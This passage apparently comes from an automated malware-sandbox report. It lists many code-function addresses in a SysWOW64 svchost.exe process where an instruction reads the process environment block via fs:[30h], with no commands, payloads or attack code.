                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D383C0 mov eax, dword ptr fs:[00000030h]2_2_02D383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D383C0 mov eax, dword ptr fs:[00000030h]2_2_02D383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D383C0 mov eax, dword ptr fs:[00000030h]2_2_02D383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D383C0 mov eax, dword ptr fs:[00000030h]2_2_02D383C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB63C0 mov eax, dword ptr fs:[00000030h]2_2_02DB63C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4E3F0 mov eax, dword ptr fs:[00000030h]2_2_02D4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4E3F0 mov eax, dword ptr fs:[00000030h]2_2_02D4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4E3F0 mov eax, dword ptr fs:[00000030h]2_2_02D4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D663FF mov eax, dword ptr fs:[00000030h]2_2_02D663FF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D403E9 mov eax, dword ptr fs:[00000030h]2_2_02D403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D403E9 mov eax, dword ptr fs:[00000030h]2_2_02D403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D403E9 mov eax, dword ptr fs:[00000030h]2_2_02D403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D403E9 mov eax, dword ptr fs:[00000030h]2_2_02D403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D403E9 mov eax, dword ptr fs:[00000030h]2_2_02D403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D403E9 mov eax, dword ptr fs:[00000030h]2_2_02D403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D403E9 mov eax, dword ptr fs:[00000030h]2_2_02D403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D403E9 mov eax, dword ptr fs:[00000030h]2_2_02D403E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D28397 mov eax, dword ptr fs:[00000030h]2_2_02D28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D28397 mov eax, dword ptr fs:[00000030h]2_2_02D28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D28397 mov eax, dword ptr fs:[00000030h]2_2_02D28397
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2E388 mov eax, dword ptr fs:[00000030h]2_2_02D2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2E388 mov eax, dword ptr fs:[00000030h]2_2_02D2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2E388 mov eax, dword ptr fs:[00000030h]2_2_02D2E388
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5438F mov eax, dword ptr fs:[00000030h]2_2_02D5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5438F mov eax, dword ptr fs:[00000030h]2_2_02D5438F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB035C mov eax, dword ptr fs:[00000030h]2_2_02DB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB035C mov eax, dword ptr fs:[00000030h]2_2_02DB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB035C mov eax, dword ptr fs:[00000030h]2_2_02DB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB035C mov ecx, dword ptr fs:[00000030h]2_2_02DB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB035C mov eax, dword ptr fs:[00000030h]2_2_02DB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB035C mov eax, dword ptr fs:[00000030h]2_2_02DB035C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DFA352 mov eax, dword ptr fs:[00000030h]2_2_02DFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD8350 mov ecx, dword ptr fs:[00000030h]2_2_02DD8350
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB2349 mov eax, dword ptr fs:[00000030h]2_2_02DB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB2349 mov eax, dword ptr fs:[00000030h]2_2_02DB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB2349 mov eax, dword ptr fs:[00000030h]2_2_02DB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB2349 mov eax, dword ptr fs:[00000030h]2_2_02DB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB2349 mov eax, dword ptr fs:[00000030h]2_2_02DB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB2349 mov eax, dword ptr fs:[00000030h]2_2_02DB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB2349 mov eax, dword ptr fs:[00000030h]2_2_02DB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB2349 mov eax, dword ptr fs:[00000030h]2_2_02DB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB2349 mov eax, dword ptr fs:[00000030h]2_2_02DB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB2349 mov eax, dword ptr fs:[00000030h]2_2_02DB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB2349 mov eax, dword ptr fs:[00000030h]2_2_02DB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB2349 mov eax, dword ptr fs:[00000030h]2_2_02DB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB2349 mov eax, dword ptr fs:[00000030h]2_2_02DB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB2349 mov eax, dword ptr fs:[00000030h]2_2_02DB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB2349 mov eax, dword ptr fs:[00000030h]2_2_02DB2349
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD437C mov eax, dword ptr fs:[00000030h]2_2_02DD437C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2C310 mov ecx, dword ptr fs:[00000030h]2_2_02D2C310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D50310 mov ecx, dword ptr fs:[00000030h]2_2_02D50310
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6A30B mov eax, dword ptr fs:[00000030h]2_2_02D6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6A30B mov eax, dword ptr fs:[00000030h]2_2_02D6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6A30B mov eax, dword ptr fs:[00000030h]2_2_02D6A30B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB20DE mov eax, dword ptr fs:[00000030h]2_2_02DB20DE
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2C0F0 mov eax, dword ptr fs:[00000030h]2_2_02D2C0F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D720F0 mov ecx, dword ptr fs:[00000030h]2_2_02D720F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2A0E3 mov ecx, dword ptr fs:[00000030h]2_2_02D2A0E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D380E9 mov eax, dword ptr fs:[00000030h]2_2_02D380E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB60E0 mov eax, dword ptr fs:[00000030h]2_2_02DB60E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3208A mov eax, dword ptr fs:[00000030h]2_2_02D3208A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF60B8 mov eax, dword ptr fs:[00000030h]2_2_02DF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF60B8 mov ecx, dword ptr fs:[00000030h]2_2_02DF60B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC80A8 mov eax, dword ptr fs:[00000030h]2_2_02DC80A8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D32050 mov eax, dword ptr fs:[00000030h]2_2_02D32050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB6050 mov eax, dword ptr fs:[00000030h]2_2_02DB6050
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5C073 mov eax, dword ptr fs:[00000030h]2_2_02D5C073
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4E016 mov eax, dword ptr fs:[00000030h]2_2_02D4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4E016 mov eax, dword ptr fs:[00000030h]2_2_02D4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4E016 mov eax, dword ptr fs:[00000030h]2_2_02D4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4E016 mov eax, dword ptr fs:[00000030h]2_2_02D4E016
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB4000 mov ecx, dword ptr fs:[00000030h]2_2_02DB4000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD2000 mov eax, dword ptr fs:[00000030h]2_2_02DD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD2000 mov eax, dword ptr fs:[00000030h]2_2_02DD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD2000 mov eax, dword ptr fs:[00000030h]2_2_02DD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD2000 mov eax, dword ptr fs:[00000030h]2_2_02DD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD2000 mov eax, dword ptr fs:[00000030h]2_2_02DD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD2000 mov eax, dword ptr fs:[00000030h]2_2_02DD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD2000 mov eax, dword ptr fs:[00000030h]2_2_02DD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD2000 mov eax, dword ptr fs:[00000030h]2_2_02DD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC6030 mov eax, dword ptr fs:[00000030h]2_2_02DC6030
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2A020 mov eax, dword ptr fs:[00000030h]2_2_02D2A020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2C020 mov eax, dword ptr fs:[00000030h]2_2_02D2C020
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02E061E5 mov eax, dword ptr fs:[00000030h]2_2_02E061E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02DAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02DAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DAE1D0 mov ecx, dword ptr fs:[00000030h]2_2_02DAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02DAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DAE1D0 mov eax, dword ptr fs:[00000030h]2_2_02DAE1D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF61C3 mov eax, dword ptr fs:[00000030h]2_2_02DF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF61C3 mov eax, dword ptr fs:[00000030h]2_2_02DF61C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D601F8 mov eax, dword ptr fs:[00000030h]2_2_02D601F8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB019F mov eax, dword ptr fs:[00000030h]2_2_02DB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB019F mov eax, dword ptr fs:[00000030h]2_2_02DB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB019F mov eax, dword ptr fs:[00000030h]2_2_02DB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB019F mov eax, dword ptr fs:[00000030h]2_2_02DB019F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2A197 mov eax, dword ptr fs:[00000030h]2_2_02D2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2A197 mov eax, dword ptr fs:[00000030h]2_2_02D2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2A197 mov eax, dword ptr fs:[00000030h]2_2_02D2A197
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D70185 mov eax, dword ptr fs:[00000030h]2_2_02D70185
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DEC188 mov eax, dword ptr fs:[00000030h]2_2_02DEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DEC188 mov eax, dword ptr fs:[00000030h]2_2_02DEC188
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD4180 mov eax, dword ptr fs:[00000030h]2_2_02DD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD4180 mov eax, dword ptr fs:[00000030h]2_2_02DD4180
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2C156 mov eax, dword ptr fs:[00000030h]2_2_02D2C156
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC8158 mov eax, dword ptr fs:[00000030h]2_2_02DC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D36154 mov eax, dword ptr fs:[00000030h]2_2_02D36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D36154 mov eax, dword ptr fs:[00000030h]2_2_02D36154
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC4144 mov eax, dword ptr fs:[00000030h]2_2_02DC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC4144 mov eax, dword ptr fs:[00000030h]2_2_02DC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC4144 mov ecx, dword ptr fs:[00000030h]2_2_02DC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC4144 mov eax, dword ptr fs:[00000030h]2_2_02DC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DC4144 mov eax, dword ptr fs:[00000030h]2_2_02DC4144
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDA118 mov ecx, dword ptr fs:[00000030h]2_2_02DDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDA118 mov eax, dword ptr fs:[00000030h]2_2_02DDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDA118 mov eax, dword ptr fs:[00000030h]2_2_02DDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDA118 mov eax, dword ptr fs:[00000030h]2_2_02DDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF0115 mov eax, dword ptr fs:[00000030h]2_2_02DF0115
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDE10E mov eax, dword ptr fs:[00000030h]2_2_02DDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDE10E mov ecx, dword ptr fs:[00000030h]2_2_02DDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDE10E mov eax, dword ptr fs:[00000030h]2_2_02DDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDE10E mov eax, dword ptr fs:[00000030h]2_2_02DDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDE10E mov ecx, dword ptr fs:[00000030h]2_2_02DDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDE10E mov eax, dword ptr fs:[00000030h]2_2_02DDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDE10E mov eax, dword ptr fs:[00000030h]2_2_02DDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDE10E mov ecx, dword ptr fs:[00000030h]2_2_02DDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDE10E mov eax, dword ptr fs:[00000030h]2_2_02DDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DDE10E mov ecx, dword ptr fs:[00000030h]2_2_02DDE10E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D60124 mov eax, dword ptr fs:[00000030h]2_2_02D60124
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6A6C7 mov ebx, dword ptr fs:[00000030h]2_2_02D6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6A6C7 mov eax, dword ptr fs:[00000030h]2_2_02D6A6C7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02DAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02DAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02DAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DAE6F2 mov eax, dword ptr fs:[00000030h]2_2_02DAE6F2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB06F1 mov eax, dword ptr fs:[00000030h]2_2_02DB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB06F1 mov eax, dword ptr fs:[00000030h]2_2_02DB06F1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D34690 mov eax, dword ptr fs:[00000030h]2_2_02D34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D34690 mov eax, dword ptr fs:[00000030h]2_2_02D34690
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D666B0 mov eax, dword ptr fs:[00000030h]2_2_02D666B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6C6A6 mov eax, dword ptr fs:[00000030h]2_2_02D6C6A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4C640 mov eax, dword ptr fs:[00000030h]2_2_02D4C640
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D62674 mov eax, dword ptr fs:[00000030h]2_2_02D62674
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF866E mov eax, dword ptr fs:[00000030h]2_2_02DF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DF866E mov eax, dword ptr fs:[00000030h]2_2_02DF866E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6A660 mov eax, dword ptr fs:[00000030h]2_2_02D6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6A660 mov eax, dword ptr fs:[00000030h]2_2_02D6A660
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72619 mov eax, dword ptr fs:[00000030h]2_2_02D72619
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DAE609 mov eax, dword ptr fs:[00000030h]2_2_02DAE609
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4260B mov eax, dword ptr fs:[00000030h]2_2_02D4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4260B mov eax, dword ptr fs:[00000030h]2_2_02D4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4260B mov eax, dword ptr fs:[00000030h]2_2_02D4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4260B mov eax, dword ptr fs:[00000030h]2_2_02D4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4260B mov eax, dword ptr fs:[00000030h]2_2_02D4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4260B mov eax, dword ptr fs:[00000030h]2_2_02D4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4260B mov eax, dword ptr fs:[00000030h]2_2_02D4260B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D4E627 mov eax, dword ptr fs:[00000030h]2_2_02D4E627
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D66620 mov eax, dword ptr fs:[00000030h]2_2_02D66620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D68620 mov eax, dword ptr fs:[00000030h]2_2_02D68620
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3262C mov eax, dword ptr fs:[00000030h]2_2_02D3262C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D3C7C0 mov eax, dword ptr fs:[00000030h]2_2_02D3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB07C3 mov eax, dword ptr fs:[00000030h]2_2_02DB07C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D347FB mov eax, dword ptr fs:[00000030h]2_2_02D347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D347FB mov eax, dword ptr fs:[00000030h]2_2_02D347FB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D527ED mov eax, dword ptr fs:[00000030h]2_2_02D527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D527ED mov eax, dword ptr fs:[00000030h]2_2_02D527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D527ED mov eax, dword ptr fs:[00000030h]2_2_02D527ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DBE7E1 mov eax, dword ptr fs:[00000030h]2_2_02DBE7E1
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DD678E mov eax, dword ptr fs:[00000030h]2_2_02DD678E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D307AF mov eax, dword ptr fs:[00000030h]2_2_02D307AF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DE47A0 mov eax, dword ptr fs:[00000030h]2_2_02DE47A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D30750 mov eax, dword ptr fs:[00000030h]2_2_02D30750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DBE75D mov eax, dword ptr fs:[00000030h]2_2_02DBE75D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72750 mov eax, dword ptr fs:[00000030h]2_2_02D72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D72750 mov eax, dword ptr fs:[00000030h]2_2_02D72750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DB4755 mov eax, dword ptr fs:[00000030h]2_2_02DB4755
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6674D mov esi, dword ptr fs:[00000030h]2_2_02D6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6674D mov eax, dword ptr fs:[00000030h]2_2_02D6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6674D mov eax, dword ptr fs:[00000030h]2_2_02D6674D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D38770 mov eax, dword ptr fs:[00000030h]2_2_02D38770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40770 mov eax, dword ptr fs:[00000030h]2_2_02D40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40770 mov eax, dword ptr fs:[00000030h]2_2_02D40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40770 mov eax, dword ptr fs:[00000030h]2_2_02D40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40770 mov eax, dword ptr fs:[00000030h]2_2_02D40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40770 mov eax, dword ptr fs:[00000030h]2_2_02D40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40770 mov eax, dword ptr fs:[00000030h]2_2_02D40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40770 mov eax, dword ptr fs:[00000030h]2_2_02D40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40770 mov eax, dword ptr fs:[00000030h]2_2_02D40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40770 mov eax, dword ptr fs:[00000030h]2_2_02D40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40770 mov eax, dword ptr fs:[00000030h]2_2_02D40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40770 mov eax, dword ptr fs:[00000030h]2_2_02D40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D40770 mov eax, dword ptr fs:[00000030h]2_2_02D40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D30710 mov eax, dword ptr fs:[00000030h]2_2_02D30710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D60710 mov eax, dword ptr fs:[00000030h]2_2_02D60710
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6C700 mov eax, dword ptr fs:[00000030h]2_2_02D6C700
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6273C mov eax, dword ptr fs:[00000030h]2_2_02D6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6273C mov ecx, dword ptr fs:[00000030h]2_2_02D6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6273C mov eax, dword ptr fs:[00000030h]2_2_02D6273C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DAC730 mov eax, dword ptr fs:[00000030h]2_2_02DAC730
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6C720 mov eax, dword ptr fs:[00000030h]2_2_02D6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6C720 mov eax, dword ptr fs:[00000030h]2_2_02D6C720
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D304E5 mov ecx, dword ptr fs:[00000030h]2_2_02D304E5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DEA49A mov eax, dword ptr fs:[00000030h]2_2_02DEA49A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D644B0 mov ecx, dword ptr fs:[00000030h]2_2_02D644B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DBA4B0 mov eax, dword ptr fs:[00000030h]2_2_02DBA4B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D364AB mov eax, dword ptr fs:[00000030h]2_2_02D364AB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02DEA456 mov eax, dword ptr fs:[00000030h]2_2_02DEA456
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D2645D mov eax, dword ptr fs:[00000030h]2_2_02D2645D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5245A mov eax, dword ptr fs:[00000030h]2_2_02D5245A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6E443 mov eax, dword ptr fs:[00000030h]2_2_02D6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6E443 mov eax, dword ptr fs:[00000030h]2_2_02D6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6E443 mov eax, dword ptr fs:[00000030h]2_2_02D6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6E443 mov eax, dword ptr fs:[00000030h]2_2_02D6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6E443 mov eax, dword ptr fs:[00000030h]2_2_02D6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6E443 mov eax, dword ptr fs:[00000030h]2_2_02D6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6E443 mov eax, dword ptr fs:[00000030h]2_2_02D6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D6E443 mov eax, dword ptr fs:[00000030h]2_2_02D6E443
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5A470 mov eax, dword ptr fs:[00000030h]2_2_02D5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5A470 mov eax, dword ptr fs:[00000030h]2_2_02D5A470
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_02D5A470 mov eax, dword ptr fs:[00000030h]2_2_02D5A470
